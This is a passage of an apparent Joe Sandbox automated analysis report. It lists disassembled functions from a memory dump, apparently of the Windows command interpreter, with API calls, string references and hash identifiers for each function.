                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                                                                                                                                                                          • String ID: 0123456789
                                                                                                                                                                                                                          • API String ID: 2034586978-2793719750
                                                                                                                                                                                                                          • Opcode ID: 7852fb3263487aabc12c8126bbf7f551e1059ff3ef109e1a4ece98bcb67106de
                                                                                                                                                                                                                          • Instruction ID: 574e54ab9d7f234d14c9235f3ba9890ead46814264f057bb7f5f9c6e76c48804
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7852fb3263487aabc12c8126bbf7f551e1059ff3ef109e1a4ece98bcb67106de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01712535B002069BDF149F68EC45B6E77A1EF85300F68816DE846A7788EB71DD46CB90
                                                                                                                                                                                                                          Function 00195020 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00195074
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 0019515F
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 001A9289
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$iswspacememset
                                                                                                                                                                                                                          • String ID: %s
                                                                                                                                                                                                                          • API String ID: 2220997661-3043279178
                                                                                                                                                                                                                          • Opcode ID: ba432d62c7223dd62de96321922292fa57890afb587b097f4a063d12b526c5fa
                                                                                                                                                                                                                          • Instruction ID: 72a76268178982195499660e2c63ec802693b655c633d87ed6a53561db8fb90c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba432d62c7223dd62de96321922292fa57890afb587b097f4a063d12b526c5fa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2051F475A01212ABCF24DFA89C4167EB3F5FF59300F28406EE845E7240EB309E81CB91
                                                                                                                                                                                                                          Function 001B70D6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 001B7121
                                                                                                                                                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 001B7197
                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 001B71FF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 001B70EE
                                                                                                                                                                                                                          • %WINDOWS_COPYRIGHT%, xrefs: 001B7107
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                          • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                                                                                                                                                                          • API String ID: 1103618819-4062316587
                                                                                                                                                                                                                          • Opcode ID: 70ee1d07a0f9ce21a9d5334541733dca1ed4ff7114e1a4e0185abb49c27c9318
                                                                                                                                                                                                                          • Instruction ID: 8dff26801422612b6ae2b4d3c3733d553543976efd1e2af3caf834225cd9d509
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70ee1d07a0f9ce21a9d5334541733dca1ed4ff7114e1a4e0185abb49c27c9318
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9841B539B012158BCF20DF6898517FA73B5AF88750F69046AE945EB390EB659E42C360
                                                                                                                                                                                                                          Function 001B2584 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 001B2652
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B2670
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001B2694
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateSemaphore
                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                          • API String ID: 4049970386-1814513734
                                                                                                                                                                                                                          • Opcode ID: 4c279d25a5048f02db21f70f6b5cec4f26135099151794247cac5369c79ddc98
                                                                                                                                                                                                                          • Instruction ID: e437d5e4e0ec80cb3cf324e1263f6c344b6ec177d1200cd6e4ce8b2d3b4c5bc9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c279d25a5048f02db21f70f6b5cec4f26135099151794247cac5369c79ddc98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B231E475B401198BCB25DF34CD98AEA33B5FFA5310F154168EC15D7240DB74CE488B60
                                                                                                                                                                                                                          Function 001B51E8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001B5295
                                                                                                                                                                                                                            • Part of subcall function 001A727B: __iob_func.MSVCRT ref: 001A7280
                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 001B5215
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __iob_func_wcsnicmpfprintf
                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                          • API String ID: 1828771275-2781220306
                                                                                                                                                                                                                          • Opcode ID: fe6997d60334d96c1d2119515c4eaa21c29fb8b479e99d088332df293a38661e
                                                                                                                                                                                                                          • Instruction ID: c6887951a03dc8960cad9f1963bf60097257e3f3f073589fd9befd741f089180
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe6997d60334d96c1d2119515c4eaa21c29fb8b479e99d088332df293a38661e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB312F36E01611DBCF28EB68DC45BEEB762DF58700F14046DEC0AE3281EB705E41C655
                                                                                                                                                                                                                          Function 0019B3C1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019AB7F: iswspace.MSVCRT ref: 0019AB8D
                                                                                                                                                                                                                            • Part of subcall function 0019AB7F: wcschr.MSVCRT ref: 0019AB9E
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0019B3FC
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0019B40E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                          • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                          • API String ID: 3458554142-2256444845
                                                                                                                                                                                                                          • Opcode ID: 09d67d85e8f2f6499f1120ee7df75507c0b75e75f002be703b2708664abb84ad
                                                                                                                                                                                                                          • Instruction ID: 404dfd25ef94f3a8ce1dc2f799d391f23bbc29dffa38c29dddc0c3a11b9b6a85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09d67d85e8f2f6499f1120ee7df75507c0b75e75f002be703b2708664abb84ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56113632A08114A6CF34DB66D58157EB7E7FFB2B50B29002AE8C297380F7319D40E251
                                                                                                                                                                                                                          Function 0019FCE9 Relevance: 7.8, APIs: 5, Instructions: 297COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0019FD3A
                                                                                                                                                                                                                          • wcsspn.MSVCRT ref: 0019FF18
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,001A2229,00000000,-00000105,?,00000000,00000000), ref: 001A000F
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D3A
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D44
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D57
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1535828850-0
                                                                                                                                                                                                                          • Opcode ID: bc355172267078ffa2d7221f7e78f1ab38b74cdc563f57cc73876d6ed2f49338
                                                                                                                                                                                                                          • Instruction ID: ac5c9feea286d0c912f662b8e090d7f564521f044a69196d5af01c08da5f6b1c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc355172267078ffa2d7221f7e78f1ab38b74cdc563f57cc73876d6ed2f49338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82C17D75A00215DFCB29DF18D890BA9B7B6FF49314F5581AEE40ADB651EB309E82CF40
                                                                                                                                                                                                                          Function 00195190 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_setjmp3
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4215035025-0
                                                                                                                                                                                                                          • Opcode ID: ba9d047ede9bca36918a71301036e075a26a2f88436eab9e88caea24a79091a6
                                                                                                                                                                                                                          • Instruction ID: e1c6acd7fabc8d73c6d015440ef30d29dfc7d7328320db14e7a208b263bd90d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba9d047ede9bca36918a71301036e075a26a2f88436eab9e88caea24a79091a6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9516CB1E012299BCF25DBA5DC94AEEBBB9FB55340F1400A9E609A7140DB309F84CF61
                                                                                                                                                                                                                          Function 001B95F2 Relevance: 7.6, APIs: 5, Instructions: 114COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001B9631
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001B964F
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001B96FD
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 001B971B
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 001B9733
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_wcsicmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1670951261-0
                                                                                                                                                                                                                          • Opcode ID: d389dc846efd1ee5f87790b1d5e41df93b71703d20af3758e87c6be0ab4e1d34
                                                                                                                                                                                                                          • Instruction ID: 0cc0beeacacd15c27c470aae9be935de8921f2d124f0e2f0fbc4434cb6c67a4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d389dc846efd1ee5f87790b1d5e41df93b71703d20af3758e87c6be0ab4e1d34
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6941AE71A102199BDF24CAA5CC85BEEB7B8EF18344F4400A9EA05E3141DB34DF84CF60
                                                                                                                                                                                                                          Function 001B94E0 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B9527
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B952F
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B95B5
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B95BD
                                                                                                                                                                                                                            • Part of subcall function 001B8C50: longjmp.MSVCRT(001D0A70,00000001,0019206C,00195E68,?,?,?,?,00000000), ref: 001B8CC4
                                                                                                                                                                                                                            • Part of subcall function 001B8C50: memset.MSVCRT ref: 001B8D1D
                                                                                                                                                                                                                            • Part of subcall function 001B8C50: memset.MSVCRT ref: 001B8D45
                                                                                                                                                                                                                            • Part of subcall function 001B8C50: memset.MSVCRT ref: 001B8D6D
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B95CC
                                                                                                                                                                                                                            • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 288106245-0
                                                                                                                                                                                                                          • Opcode ID: 33b3eb1b814fcd7dfc4ca1344ab607907cba1302b3eeb2da2d4ef17e3164b0e3
                                                                                                                                                                                                                          • Instruction ID: 74a8bbcf919c26715fa39b5fc917a2b86318fb7da08d1c9a28485623c8e7a1e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33b3eb1b814fcd7dfc4ca1344ab607907cba1302b3eeb2da2d4ef17e3164b0e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A031A471A11204AFEF29EF74D849BEE7769EF54311F20812AF602D61C1DB74DD428B50
                                                                                                                                                                                                                          Function 001A260E Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,001A1775,-00000001,-00000001,-00000001,-00000001), ref: 001A2650
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001AF339
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,001A1775,-00000001,-00000001,-00000001,-00000001), ref: 001AF347
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001,?,00000104,00000000,?,?,001A1775,-00000001,-00000001,-00000001,-00000001), ref: 001AF383
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,001A87F0,?,?,?,001A87F0,00000000,?,00194A0A), ref: 001AF390
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 158340877-0
                                                                                                                                                                                                                          • Opcode ID: da6e41e79dfe20dc165fea0ab42d114421cdadd37a244866e8a8e1e5442e215b
                                                                                                                                                                                                                          • Instruction ID: 80be944f90c325a125fb29c85d1813ddc56daf0412c3ab11f50f6ae46693a8c7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da6e41e79dfe20dc165fea0ab42d114421cdadd37a244866e8a8e1e5442e215b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C31AB75A023059FDB24EFB8D885ABEB7F8EF58B55B14452EE846C2540EB70D841CB50
                                                                                                                                                                                                                          Function 001A4CA0 Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001A4CC2
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001B8FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 001A4CCA
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B0BFC
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B0C48
                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001B0C71
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3588551418-0
                                                                                                                                                                                                                          • Opcode ID: 7671413e1e318a7d6d5de484f3bf1818a873a4e40cd4908b9bcfee9e4dd2a3d4
                                                                                                                                                                                                                          • Instruction ID: 7ddf9c2c81cd6db732807207864240fcc9fb6858eee191073253a8efdb7d2b48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7671413e1e318a7d6d5de484f3bf1818a873a4e40cd4908b9bcfee9e4dd2a3d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2031F134601200AFDF18DFA4D8469BF3B69FF95314B20442AE802C3691DB74DC80CB61
                                                                                                                                                                                                                          Function 0019E272 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
